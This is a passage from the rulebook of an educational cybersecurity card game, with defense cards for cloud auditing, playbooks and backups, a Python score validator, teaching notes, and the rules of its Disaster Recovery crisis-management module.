│ privilege access. Regularly review  │
│ who has what permissions. Detect    │
│ and revoke unused credentials.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad       │
│  permissions                        │
│ - Service accounts with admin access│
│ - Stale credentials from departed   │
│  employees                          │
│ - Cross-account trust abuse         │
│ Reduces blast radius if credentials │
│ are compromised.                    │
│                                     │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state.  │
└─────────────────────────────────────┘

Card D-36: Cloud Compliance & Audit Trail (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable comprehensive cloud audit    │
│ logging (CloudTrail, Stackdriver,   │
│ Activity Monitor). Forward all logs │
│ to immutable, centralized storage.  │
│ Monitor for unauthorized API calls, │
│ data access, and resource changes.  │
│ Enable MFA Delete on audit logs.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides forensic trail for:        │
│ - Detecting API token abuse         │
│ - Investigating data exfiltration   │
│ - Compliance reporting              │
│ - Incident response timeline        │
│ Prevents attackers from covering    │
│ tracks (immutable logs). Enables    │
│ rapid investigation of cloud API    │
│ compromises.                        │
│                                     │
│ COST: High storage requirements.    │
└─────────────────────────────────────┘

Incident Response Playbooks

Card D-37: Playbook: Ransomware Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE       │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built, tested ransomware        │
│ response playbook covering:         │
│ - Immediate network isolation steps │
│ - Communication procedures          │
│ - Forensic data collection          │
│ - Restoration procedures            │
│ - Stakeholder notifications         │
│ Train incident response team on     │
│ playbook annually.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 or when ransomware   │
│ is detected:                        │
│ Get +4 bonus to defense rolls when  │
│ responding to ransomware threats.   │
│ Reduces response time, limiting     │
│ damage.                             │
│                                     │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination.  │
└─────────────────────────────────────┘

Card D-38: Playbook: Credential Compromise Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE     │
│ RESPONSE                            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built playbook for credential   │
│ compromise scenarios:               │
│ - Identify affected accounts        │
│ - Forced password reset procedures  │
│ - Session invalidation              │
│ - MFA re-enrollment process         │
│ - Forensic user activity review     │
│ - Privileged account audit          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When investigating compromised      │
│ credentials:                        │
│ Get +4 bonus to defense rolls.      │
│ Allows rapid containment before     │
│ lateral movement occurs.            │
│                                     │
│ EXAMPLE USE: During "Mimikatz       │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts.    │
└─────────────────────────────────────┘

Card D-39: Playbook: Insider Threat Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Comprehensive insider threat        │
│ response playbook including:        │
│ - HR coordination protocols         │
│ - Legal review and preservation     │
│ - Forensic evidence collection      │
│ - Physical security response        │
│ - System access removal procedures  │
│ - Communication to management       │
│ Requires cross-functional team      │
│ coordination.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls.      │
│ Requires strong organizational      │
│ processes to be effective.          │
│                                     │
│ EXAMPLE USE: When "Malicious        │
│ Insider Data Theft" is detected,    │
│ playbook coordinates response across│
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘

Card D-40: Playbook: Supply Chain Breach Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH       │
│ RESPONSE                            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Specialized playbook for supply     │
│ chain compromises:                  │
│ - Vendor notification procedures    │
│ - Industry coordination             │
│ - Affected system inventory         │
│ - Patch deployment prioritization   │
│ - Third-party impact assessment     │
│ - Public communication strategy     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 when defending       │
│ against supply chain attacks:       │
│ Get +5 bonus to defense rolls.      │
│ Requires vendor relationships and   │
│ industry collaboration.             │
│                                     │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘

Backup & Disaster Recovery

Card D-41: Backup Strategy - 3-2-1 Rule (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup rule:    │
│ - 3 copies of data                  │
│ - 2 different media types           │
│ - 1 copy offline/offsite            │
│ Regular backup verification testing.│
│ Document retention and recovery     │
│ RPO/RTO (Recovery Point/Time        │
│ Objectives).                        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ If ransomware encrypts data:        │
│ Recovery becomes possible without   │
│ paying ransom. Offline backups      │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact    │
│ significantly.                      │
│                                     │
│ LIMITATION: Only effective if       │
│ backups are regularly tested and    │
│ truly offline.                      │
└─────────────────────────────────────┘

Card D-42: Immutable Backup Storage (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy backup storage with WORM     │
│ (Write-Once-Read-Many) protection.  │
│ Once backups are written, they      │
│ cannot be modified or deleted,      │
│ even by administrators. Implement   │
│ MFA Delete on storage. Use an       │
│ air-gapped backup network.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Even if attacker gains admin access │
│ or compromises backup system:       │
│ Backups remain protected and        │
│ unmodifiable. Enables guaranteed    │
│ recovery. Works against double-     │
│ extortion ransomware attacks.       │
│                                     │
│ COST: Higher storage cost for       │
│ immutable solutions.                │
└─────────────────────────────────────┘

Card D-43: Disaster Recovery Plan & Testing (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish comprehensive disaster    │
│ recovery plan (DRP) including:      │
│ - Failover procedures               │
│ - Alternate site readiness          │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols           │
│ - Key personnel contacts            │
│ Conduct quarterly DRP drills and    │
│ recovery testing.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During ransomware or supply chain   │
│ attacks:                            │
│ Get +3 bonus to all defense rolls   │
│ after initial containment. Enables  │
│ business continuity.                │
│                                     │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘

Defense Card Integration Guide

By Threat Type Mapping

Against Supply Chain Attacks (T-13, T-14):
  - D-31: Container Image Scanning
  - D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks)
  - D-40: Playbook: Supply Chain Breach Response

Against Insider Threats (T-15, T-16):
  - D-28: Baseline Behavior Learning System
  - D-29: Process Behavior Analysis
  - D-39: Playbook: Insider Threat Response

Against IoT Compromise (T-17):
  - D-25: Application Whitelisting
  - D-31: Container Image Scanning (if containerized)
  - D-28: Baseline Behavior Learning System

Against Cloud API Abuse (T-18):
  - D-34: Cloud Configuration Auditing
  - D-35: Cloud Access & Permission Auditing
  - D-36: Cloud Compliance & Audit Trail

Against DNS Tunneling (T-19):
  - D-28: Baseline Behavior Learning System (network baseline)
  - D-30: Machine Learning Anomaly Detection

Against Physical Security Bypass (T-20):
  - D-28: Baseline Behavior Learning System (detection)
  - D-38: Playbook: Credential Compromise Response

Against Ransomware (T-11, supply chain variants):
  - D-41: Backup Strategy - 3-2-1 Rule
  - D-42: Immutable Backup Storage
  - D-43: Disaster Recovery Plan & Testing
  - D-37: Playbook: Ransomware Response


Sample Defense Card Combinations

"Enterprise Ransomware Defense" (4 cards, 55 Budget)

"Cloud-Native Security" (4 cards, 75 Budget)

"Insider Threat Detection & Response" (4 cards, 75 Budget)

"Zero-Trust Architecture" (5 cards, 95 Budget)


Hardening Module with Expansion Defense Cards

Hardening Scenario: Enterprise Defense Build-Out (7 turns, v2.2)

Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)

  Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent
  Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent
  Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent
  Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent
  Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent
  Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent
  Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining

Final Security Score Calculation (v2.2 formula):
  - (8 defenses deployed × 5) = 40 points
  - (0 hardening upgrades × 2) = 0 points
  - (1 playbook × 10) = 10 points
  - (3 of 4 pentester tactics defended × 5) = 15 points
  - Budget efficiency: (30 / 150) × 10 = 2 points
  - Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)
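The build-out and score calculation above, as an added example that is not part of the Incident Zero rulebook or print pack: a small Python validator that replays the seven turns, enforces the one-action-per-turn rule (only two BASIC defenses may share an action) and recomputes the v2.2 Security Score. Function and field names are my own, and rounding budget efficiency down is my assumption.

```python
"""Incident Zero v2.2 Hardening: build-out validator and Security Score.

Added example; this is not code from the Incident Zero rulebook or print pack.
It replays the "Enterprise Defense Build-Out" scenario turn by turn, enforcing
the one-action-per-turn rule (only two BASIC defenses may share an action),
and computes the v2.2 Security Score. Function and field names are my own;
card tiers and costs are taken from the Expansion Defense Card Deck Summary.
"""
from dataclasses import dataclass, field
from typing import List, Sequence, Tuple

# Deck summary: card -> (tier, Budget). Only the cards this scenario uses.
EXPANSION_DECK = {
    "D-25": ("BASIC", 10), "D-28": ("ADVANCED", 15), "D-31": ("BASIC", 10),
    "D-32": ("ADVANCED", 15), "D-34": ("BASIC", 10), "D-35": ("ADVANCED", 15),
    "D-36": ("ELITE", 25), "D-41": ("BASIC", 10),
}
PLAYBOOK_COST = 10  # "Create MALWARE playbook (10)" in the scenario


@dataclass
class HardeningState:
    starting_budget: int
    budget: int
    defenses: List[str] = field(default_factory=list)
    playbooks: List[str] = field(default_factory=list)
    upgrades: int = 0  # hardening upgrades are not played in this scenario


def legal_defend(cards: Sequence[str]) -> bool:
    """One action per turn: a single card, or a pair that is BASIC + BASIC."""
    tiers = [EXPANSION_DECK[c][0] for c in cards]
    return len(cards) == 1 or (len(cards) == 2 and tiers == ["BASIC", "BASIC"])


def play_turn(state: HardeningState, action: Tuple[str, object]) -> None:
    """Apply one turn's action: ("defend", [cards]) or ("playbook", name)."""
    kind, arg = action
    if kind == "defend":
        cards = list(arg)
        if not legal_defend(cards):
            raise ValueError(f"illegal action {cards}: only two BASIC defenses may share a turn")
        cost = sum(EXPANSION_DECK[c][1] for c in cards)
    elif kind == "playbook":
        cards, cost = [], PLAYBOOK_COST
    else:
        raise ValueError(f"unknown action kind {kind!r}")
    if cost > state.budget:
        raise ValueError(f"action costs {cost} Budget but only {state.budget} remains")
    state.budget -= cost
    state.defenses.extend(cards)
    if kind == "playbook":
        state.playbooks.append(str(arg))


def run_scenario(actions, starting_budget: int = 150, turn_limit: int = 7) -> HardeningState:
    """Play a fixed list of per-turn actions and return the end state."""
    if len(actions) > turn_limit:
        raise ValueError(f"{len(actions)} actions exceed the {turn_limit}-turn limit")
    state = HardeningState(starting_budget=starting_budget, budget=starting_budget)
    for action in actions:
        play_turn(state, action)
    return state


def security_score(state: HardeningState, tactics_defended: int) -> int:
    """v2.2 formula: defenses x5 + upgrades x2 + playbooks x10 + tactics defended x5
    + budget efficiency (remaining / starting) x10, rounded down (my assumption)."""
    efficiency = (state.budget * 10) // state.starting_budget
    return (5 * len(state.defenses) + 2 * state.upgrades
            + 10 * len(state.playbooks) + 5 * tactics_defended + efficiency)


def is_victory(state: HardeningState, tactics_defended: int, tactics_drawn: int) -> bool:
    """Victory: score >= 60, at least 4 defenses, majority of drawn tactics defended."""
    return (security_score(state, tactics_defended) >= 60
            and len(state.defenses) >= 4
            and 2 * tactics_defended > tactics_drawn)


# The scenario as printed: seven turns, one action each.
ENTERPRISE_BUILD_OUT = [
    ("defend", ["D-34", "D-25"]),  # Turn 1: Quick-Win pair -> 20 spent
    ("defend", ["D-41", "D-31"]),  # Turn 2: Quick-Win pair -> 40 spent
    ("defend", ["D-28"]),          # Turn 3 -> 55 spent
    ("defend", ["D-32"]),          # Turn 4 -> 70 spent
    ("defend", ["D-35"]),          # Turn 5 -> 85 spent
    ("playbook", "MALWARE"),       # Turn 6 -> 95 spent
    ("defend", ["D-36"]),          # Turn 7 -> 120 spent, 30 remaining
]

if __name__ == "__main__":
    end = run_scenario(ENTERPRISE_BUILD_OUT)
    print(f"defenses={len(end.defenses)} remaining={end.budget} "
          f"score={security_score(end, 3)} victory={is_victory(end, 3, 4)}")
```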


Pentester Tactic Card Interactions with Defense Cards (v2.2)

When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):

PT-01: Social Engineering - Pretexting (DC 12)

PT-02: Malware Evasion - Living-off-the-Land (DC 13)

PT-03: Credential Dumping - Mimikatz (DC 13)

PT-04: Lateral Movement - Network Traversal (DC 13)

PT-05: Privilege Escalation - Kernel Exploit (DC 14)

PT-06: Data Exfiltration - Unmonitored Channel (DC 14)

PT-07: Supply Chain Compromise - Trusted Update (DC 14)

PT-08: Insider Threat - Malicious Administrator (DC 15)


Teaching Notes for Defense Card Expansion

Application Whitelisting (D-25, D-26, D-27)

Why it matters:
  - Stops 90%+ of malware variants if properly configured
  - "Defense in depth" - cheap to start, expensive to perfect
  - Trade-off: Security vs. usability (users can't run unauthorized apps)

Real-world context:
  - Used by government agencies and financial institutions
  - Apple's approach (iOS/macOS sandboxing)
  - Increasingly common in "zero trust" architectures

Discussion points:
  - "What's blocked by a living-off-the-land blocker that regular whitelisting isn't?"
  - "Why is adoption slow despite effectiveness?"

Behavioral Analytics (D-28, D-29, D-30)

Why it matters:
  - Catches attacks that don't match known signatures
  - Foundation for modern threat detection
  - Requires a "normal" baseline to be effective

Real-world context:
  - Splunk, Elastic, Sentinel use behavioral analytics
  - UEBA systems detect insider threats
  - Process behavior monitoring by CrowdStrike Falcon, Tanium

Discussion points:
  - "What counts as 'abnormal' and who decides?"
  - "How do you build a baseline without including attacks?"
  - "Why can't signature-based antivirus do this?"

Container Security (D-31, D-32, D-33)

Why it matters:
  - Container environments have unique attack surfaces
  - Rapid deployment means traditional approaches fail
  - Network segmentation at container level is powerful

Real-world context:
  - Kubernetes is now the standard container orchestrator
  - Docker/container adoption is 90%+ in enterprises
  - Container escape vulnerabilities (runc, containerd, etc.)

Discussion points:
  - "How is container security different from VM security?"
  - "Why is network policy critical in Kubernetes?"
  - "What's an example of a container escape attack?"

Cloud Security Posture Management (D-34, D-35, D-36)

Why it matters:
  - Cloud misconfigurations are a leading breach cause
  - Shared responsibility model confuses organizations
  - API-driven access requires different monitoring

Real-world context:
  - Hundreds of millions exposed via public S3 buckets
  - Capital One breach: misconfigured WAF
  - Equifax: unpatched open-source component in cloud environment

Discussion points:
  - "Who's responsible for cloud security: vendor or organization?"
  - "How do you audit permissions when there are 1000s of IAM roles?"
  - "Why is 'least privilege' hard to achieve in practice?"

Incident Response Playbooks (D-37, D-38, D-39, D-40)

Why it matters:
  - Pre-planning reduces response time significantly
  - Coordination across teams is critical
  - Written procedures prevent panic decisions

Real-world context:
  - Organizations without playbooks average 9+ month detection time
  - With playbooks, average drops to 3-4 months
  - Playbooks required by HIPAA, PCI-DSS, NIST frameworks

Discussion points:
  - "Who should be involved in ransomware response?"
  - "How do you balance forensics with business recovery?"
  - "Why test playbooks if you hope to never use them?"

Backup & Disaster Recovery (D-41, D-42, D-43)

Why it matters:
  - Ransomware made backups critical (not just compliance)
  - Recovery is often the cheapest way to respond to attacks
  - Immutable backups prevent attacker deletion

Real-world context:
  - Many ransomware attacks double-extort (steal + encrypt)
  - Immutable backups became critical after backup deletion attacks
  - AWS S3, Azure Blob WORM protection adopted widely

Discussion points:
  - "Can backups be targeted by attackers?"
  - "What's the difference between backup and disaster recovery?"
  - "Why would immutable backups be controversial?"


Expansion Defense Card Deck Summary

| Card | Title                                    | Tier     | Budget | Countermeasure   |
|------|------------------------------------------|----------|--------|------------------|
| D-25 | Application Whitelisting                 | BASIC    | 10     | MALWARE          |
| D-26 | Advanced Application Control with AI     | ADVANCED | 15     | MALWARE          |
| D-27 | Living-Off-The-Land Blocker              | ELITE    | 25     | MALWARE          |
| D-28 | Baseline Behavior Learning System        | ADVANCED | 15     | NETWORK          |
| D-29 | Process Behavior Analysis                | ADVANCED | 15     | MALWARE          |
| D-30 | Machine Learning Anomaly Detection       | ELITE    | 25     | MALWARE          |
| D-31 | Container Image Scanning                 | BASIC    | 10     | MALWARE          |
| D-32 | Container Runtime Protection             | ADVANCED | 15     | MALWARE          |
| D-33 | Kubernetes Network Policy & RBAC         | ELITE    | 25     | NETWORK          |
| D-34 | Cloud Configuration Auditing             | BASIC    | 10     | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing       | ADVANCED | 15     | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail           | ELITE    | 25     | DATA EXFIL       |
| D-37 | Playbook: Ransomware Response            | ADVANCED | 15     | MALWARE          |
| D-38 | Playbook: Credential Compromise Response | ADVANCED | 15     | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response        | ELITE    | 25     | DATA EXFIL       |
| D-40 | Playbook: Supply Chain Breach Response   | ELITE    | 25     | WEB EXPLOIT      |
| D-41 | Backup Strategy - 3-2-1 Rule             | BASIC    | 10     | MALWARE          |
| D-42 | Immutable Backup Storage                 | ADVANCED | 15     | MALWARE          |
| D-43 | Disaster Recovery Plan & Testing         | ELITE    | 25     | MALWARE          |

Total Expansion Cards: 19 (D-25 to D-43)
Budget Range: 10 (BASIC) to 25 (ELITE)
Distribution:
  - 4 BASIC (D-25, D-31, D-34, D-41)
  - 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42)
  - 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)


Building Custom Scenarios with Expansion Cards

Template: "Expert Level Scenario"

Setup:
  - 5-card threat chain (mix of base + expansion threats)
  - Starting Budget: 120
  - Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]

Incident Response Attack Chain Example:
  1. Compromised Software Vendor Update (T-13) → MALWARE
  2. Lateral Movement via SMB (T-04) → NETWORK
  3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE
  4. Disgruntled Employee Sabotage (T-16) → MALWARE
  5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL

Incident Response Recommended Defense Starting Hand:
  - D-31: Container Image Scanning (10)
  - D-28: Baseline Behavior Learning System (15)
  - D-34: Cloud Configuration Auditing (10)
  - D-35: Cloud Access & Permission Auditing (15)
  - D-37: Playbook: Ransomware Response (15) - reusable

Hardening Strategy:
  - Deploy D-32, D-33 for container security
  - Deploy D-36 for cloud audit trails
  - Deploy D-30 for insider threat detection
  - Prepare D-39 playbook for insider coordination

Pentester Tactics to Draw (Hardening):
  1. PT-07: Supply Chain Compromise (countered by D-31, D-40)
  2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30)
  3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)


Printable Card Layout

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use different color for expansion deck (e.g., teal background vs. white)
  3. Cut along dotted lines
  4. Consider laminating or card sleeves
  5. Store in separate box from base deck

Color Coding Suggestions


Recommended Deck Combinations

Complete Game with All Cards

Recommended Play: Use subsets based on experience level
  - Beginners: Base deck only
  - Intermediate: Base + 4 expansion threats (choose scenario)
  - Advanced: Base + all expansion cards


Quick Integration Checklist


Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections

docs/rules/module-disaster-recovery.md

Disaster Recovery Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025

v2.2: the card system is canonical. The Disaster Recovery game is played with 12 Crisis Action cards (plus ACTION-13), 12 Event cards, and 5 Stakeholder cards. Track advances are deterministic — dice are used only for the optional Justification bonus and ACTION-13's "no guarantee" roll. See cards/disaster-recovery/ for the cards themselves and v2.2 Playtest Edition Changes at the bottom of this document for what changed.


Module Overview

The Disaster Recovery Module teaches crisis management and breach response when incident detection fails. This module is typically entered after losing an Incident Response module (representing an undetected or uncontained breach) but can also be played standalone to teach DR concepts.

This is not a "second chance" to solve the attack chain. Instead, it simulates the real-world consequences of a successful breach:
  - Crisis management under pressure
  - Stakeholder communication (board, customers, regulators)
  - Forensic investigation with limited budget
  - Public disclosure and legal requirements
  - Incident containment and damage assessment
  - Financial impact and recovery costs

Educational Purpose

Incident Response: Teaches proactive threat detection and investigation
Hardening (typically after an IR win): Teaches proactive defense and resilience
Disaster Recovery (typically after an IR loss): Teaches crisis management, consequences, and recovery


Components (v2.2)

| Component                                    | Count | Purpose                                                     |
|----------------------------------------------|-------|-------------------------------------------------------------|
| Crisis Action cards (ACTION-01 to ACTION-13) | 13    | The actions teams play each turn                            |
| Event cards (EVENT-01 to EVENT-12)           | 12    | 6 Scheduled + 6 Triggered pressure events                   |
| Stakeholder cards (STAKE-01 to STAKE-05)     | 5     | Five trust meters (0-100%)                                  |
| Progress tracks                              | 3     | Investigation %, Remediation %, Communication % (0-100%)    |
| d20                                          | 1     | Optional Justification bonus; ACTION-13 "no guarantee" roll |
| Track/trust sheets                           |       | See print pack (coming) — a piece of paper works fine       |

Money mapping: 1 Budget ≈ $50K. All dollar figures (fines, ransoms) use this mapping unless marked narrative-only.


Entering the DR Phase

Prerequisites for DR Phase

Trigger: Team lost the Incident Response module by either:
  - Reaching Turn 10 with unrevealed cards remaining, OR
  - Running out of Budget (reaching 0)

Outcome: The attack chain proceeded undetected. The threat actor succeeded.

(Standalone play: skip Incident Response and start here — see the standalone guide.)

Discovery & Revelation

The Threat Orchestrator reveals the entire unrevealed attack chain to the Blue Team:
  - All hidden Threat cards are shown
  - The complete attack progression is explained
  - The attacker's objectives are stated

Example Revelation: "Your security team was unable to detect the attack in time. The attacker successfully:
  1. Sent a phishing email (SOCIAL ENGINEERING)
  2. Harvested credentials (CREDENTIAL ABUSE)
  3. Moved laterally across your network (NETWORK)
  4. Dumped admin credentials (CREDENTIAL ABUSE)
  5. Exfiltrated your entire customer database (DATA EXFIL)

The attacker is now threatening to publish the data unless you pay $1M (20 Budget). You have 72 hours before regulators must be notified."


Setup (v2.2)

  1. Establish DR Budget:
     - Starting DR Budget = 50 (flat crisis allocation — insurance, emergency funds)
     - If entering from Incident Response: add any remaining IR budget (operational reserves)
     - If an Audit was played earlier: subtract audit gap penalties (total capped at -30 — see module-audit-compliance.md)
     - Budget floor is 0. Budget can never go negative; the free Holding Statement action is always available.

  2. Set the three progress tracks to 0%: Investigation, Remediation, Communication.

  3. Set the five stakeholder trust meters to their starting values: Customers 50%, Regulators 60%, Media 40%, Board 70%, Executives 80%. Meters clamp to 0-100%.

  4. Build the Event Timeline: place the 6 Scheduled events on their turns (EVENT-01 Turn 2, EVENT-04 Turn 3, EVENT-03 + EVENT-09 Turn 5, EVENT-02 Turn 6, EVENT-12 Turn 7). Lay the 6 Triggered events face-up where their conditions can be read.

  5. Ransom scenarios: note the ransom deadline (default: start of Turn 5) and put ACTION-13 where the team can see it.

  6. Reputation is NOT tracked during play. It is computed once, at game end (see Final Scoring). During play, the three tracks and five trust meters are the whole state.


The Crisis Clock (v2.2) — ONE clock

The game lasts 8 turns. Each turn is one crisis phase of ~6-12 hours of narrative time:

| Turn | Narrative Time | Key Deadline |
|------|----------------|--------------|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Internal legal/executive escalation complete (narrative; this was mislabeled a "regulatory deadline" in v2.1 — the regulatory anchor is GDPR 72h) |
| 3 | +18h | Board Meeting (EVENT-04) |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended (ACTION-09); default ransom deadline (ACTION-13) |
| 6 | +48h | Regulatory escalation begins (EVENT-02): -10 Regulator trust per un-notified turn |
| 7 | +60h | Government subpoena (EVENT-12) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |

All deadlines on every card use this clock. There are no 12-hour, 24-hour, 30-day, or 60-day timers anymore; the former 30/60-day deadlines are deferred final-scoring consequences (see Final Scoring).

(Exception: EVENT-08 Second Breach extends play to Turn 10, once per game. Scoring deadlines do not move.)


Turn Sequence (v2.2)

Each turn:

1. START OF TURN
   - Complete any in-flight multi-turn action that finishes now (apply its track advance)
   - Reveal and resolve this turn's Scheduled event
   - Check all un-fired Triggered events; resolve any whose condition is met
   - Apply decay/deadline penalties (e.g., Customer decay, Regulator -10/turn from Turn 6 if un-notified)

2. TEAM ACTION (2-3 minutes discussion)
   - Play ONE Crisis Action card: pay its Budget cost, apply its track advance
   - Multi-turn actions (Duration N): the card occupies your action slot only on the turn started; its advance completes at the start of the Nth following turn. Only one multi-turn action in flight at a time.
   - Or take the free Holding Statement (0 Budget, +5% Communication; always available, counts as a Communication action for decay purposes)
   - Optional Justification bonus (v2.2): if the team gives a strong, specific technical justification for the action, the TO may allow a d20 roll — on 11+, that action's track advance gains +5%. This is the only d20 in track advancement, and it is a bonus, never a gate.
   - ACTION-13 (Ransom Decision) may be declared at any time before the ransom deadline; it does not use the action slot and happens once per game.

3. APPLY STAKEHOLDER EFFECTS
   - Apply the played action's trust effects (table below)

4. END OF TURN
   - Check the loss condition: any stakeholder trust at 0% = immediate loss ("the company collapses")
   - Advance the turn counter

Action → Trust Effects (v2.2 canonical table)

| Action | Trust effects when completed |
|--------|------------------------------|
| ACTION-01 Forensic Analysis | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | (none) |
| ACTION-03 Log Analysis | (none) |
| ACTION-04 Third-Party IR | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Executives +5 |
| ACTION-06 Containment | Executives +5 |
| ACTION-07 Rebuild from Backup | Executives +5, Customers +5, Board +5 |
| ACTION-08 Credential Reset | Executives +5 |
| ACTION-09 Customer Notification | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Regulators +20 |
| ACTION-11 Media Management | Media +20, Customers +10 |
| ACTION-12 Board Communication | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | (scoring effects only) |
| Holding Statement (free) | (stops Customer decay) |

Where a Stakeholder card lists a range (e.g., "+2-5%"), this table is the single authoritative value (v2.2).


Deadlines (v2.2)

| Deadline | Turn | If missed |
|----------|------|-----------|
| Internal legal/executive escalation | End of Turn 2 | Narrative only |
| Customer notification (ACTION-09) | End of Turn 5 (recommended) | Customer trust -10 per later turn; EVENT-05 Class Action may trigger; never notified = -15 Reputation at final scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) — GDPR 72h | End of Turn 8 (escalating from Turn 6) | Regulator trust -10 per turn from Turn 6 while un-notified; never notified = -20 Reputation at final scoring (deferred fine) |

Ransomware & ACTION-13 (v2.2)

If the scenario includes a ransom/extortion demand, the team must resolve ACTION-13: Ransom Decision before the ransom deadline (default: start of Turn 5). Exactly one option, once per game:

| Option | Cost | Reputation (at scoring) | Effect |
|--------|------|-------------------------|--------|
| PAY | 20 Budget (≈ $1M) | -15 | Data-publication event skipped/cancelled; +20% Remediation immediately. No guarantee: TO rolls d20 — on 1-5 the keys don't work: no refund, +0% Remediation (publication stays cancelled). |
| NEGOTIATE | 5 Budget | -5 | Data-publication event delayed by 2 turns (default: to start of Turn 7). |
| REFUSE | 0 Budget | 0 (-20 if the data-publication event later triggers) | No payment, no delay. |

